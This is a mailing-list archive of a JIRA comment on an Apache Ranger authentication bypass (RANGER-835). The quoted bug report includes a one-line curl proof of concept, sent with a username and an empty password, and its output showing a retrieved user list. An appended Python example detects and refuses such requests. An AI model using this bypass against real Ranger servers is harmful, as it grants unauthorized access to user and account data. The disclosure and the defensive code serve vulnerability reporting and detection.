ranger-dev mailing list archives

From "Larry McCay (JIRA)" <j...@apache.org>
Subject [jira] [Commented] (RANGER-835) Authentication bypass in Ranger API
Date Wed, 10 Feb 2016 19:38:18 GMT

    [ https://issues.apache.org/jira/browse/RANGER-835?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15141509#comment-15141509
] 

Larry McCay commented on RANGER-835:
------------------------------------

[~dillidorai] - 

The fact that #15 would leak implementation details and the ability to reverse engineer an
exploit if you were to follow it does not explicitly require that such things be made public.
Since Ranger is not using svn it is perfectly acceptable to not follow #15 - as you have pointed
out.

Steps #9-12 clearly describe that the details be discussed and agreed upon in private on either
the project security or private email lists. PPMC members are encouraged to review and discuss
the approach taken for such issues on those lists.

Thanks again.

> Authentication bypass in Ranger API
> -----------------------------------
>
>                 Key: RANGER-835
>                 URL: https://issues.apache.org/jira/browse/RANGER-835
>             Project: Ranger
>          Issue Type: Bug
>          Components: Ranger
>    Affects Versions: 0.5.0
>            Reporter: Jim Halfpenny
>            Priority: Critical
>              Labels: authentication, security, vulnerability
>             Fix For: 0.5.1, 0.6.0
>
>
> Authentication to the Ranger API can be trivially bypassed by sending a valid username
> along with a null password. API authentication appears to work correctly, rejecting requests
> if the password is incorrect but allows requests where no password has been sent.
> The example below uses curl to demonstrate this issue by retrieving a list of the users.
> $ curl -u admin: -v http://127.0.0.1:6080/service/xusers/users
> *   Trying 127.0.0.1...
> * Connected to 127.0.0.1 (127.0.0.1) port 6080 (#0)
> * Server auth using Basic with user 'admin'
> > HEAD /service/xusers/users HTTP/1.1
> > Host: 127.0.0.1:6080
> > Authorization: Basic YWRtaW46
> > User-Agent: curl/7.43.0
> > Accept: */*
> > 
> < HTTP/1.1 200 OK
> < Server: Apache-Coyote/1.1
> < Set-Cookie: JSESSIONID=96458E9E9A792D794D8C0D23839CFFC9; Path=/; HttpOnly
> < Content-Type: application/xml
> < Content-Length: 0
> < Date: Fri, 05 Feb 2016 11:41:16 GMT
> < 
> <?xml version="1.0" encoding="UTF-8" standalone="yes"?><vxUserList><resultSize>48</resultSize><vXUsers>...



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
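An added example, not part of the JIRA issue or of the Ranger code base, illustrating the quoted report from the defender's side: a pre-authentication gate that refuses Basic credentials carrying an empty password (the `Authorization: Basic YWRtaW46` header in the curl transcript decodes to `admin:`), plus a scan over constructed request lines that flags such attempts for detection. The request-line layout and all function names are assumptions.

```python
import base64
import binascii
import re
from typing import List, Optional, Tuple

# Constructed request lines, not real Ranger logs; the "METHOD PATH Authorization: ..." layout is an assumption.
SAMPLE_REQUESTS = [
    "GET /service/xusers/users Authorization: Basic YWRtaW46",          # admin:  (empty password, as in the report)
    "GET /service/xusers/users Authorization: Basic YWRtaW46c2VjcmV0",  # admin:secret
    "GET /service/xusers/users Authorization: Basic Ym9iOg==",          # bob:    (empty password)
    "GET /service/public/api/policy",                                   # no credentials at all
]
AUTHZ_RE = re.compile(r"Authorization:\s*(Basic\s+\S+)", re.IGNORECASE)

def parse_basic_auth(header: Optional[str]) -> Optional[Tuple[str, str]]:
    """Decode a Basic Authorization header into (user, password); None if absent, non-Basic or malformed. An empty password comes back as ""."""
    if not header:
        return None
    scheme, _, token = header.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        decoded = base64.b64decode(token.strip(), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = decoded.partition(":")
    if not sep:
        return None  # RFC 7617 requires a colon between user-id and password
    return user, password

def credentials_acceptable(header: Optional[str]) -> bool:
    """Gate to run before any backend (database or directory) password check: refusing empty
    user names and passwords here means a backend that treats "" as "no password" is never consulted."""
    creds = parse_basic_auth(header)
    if creds is None:
        return False
    user, password = creds
    return bool(user) and bool(password)

def flag_empty_password_requests(lines: List[str]) -> List[Tuple[int, str]]:
    """Detection: (line_number, user) for every request whose Basic credentials carry an empty password."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = AUTHZ_RE.search(line)
        if match:
            creds = parse_basic_auth(match.group(1))
            if creds is not None and creds[1] == "":
                hits.append((number, creds[0]))
    return hits
```

Running `flag_empty_password_requests(SAMPLE_REQUESTS)` returns `[(1, 'admin'), (3, 'bob')]`; the gate rejects those same headers while accepting `admin:secret`.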
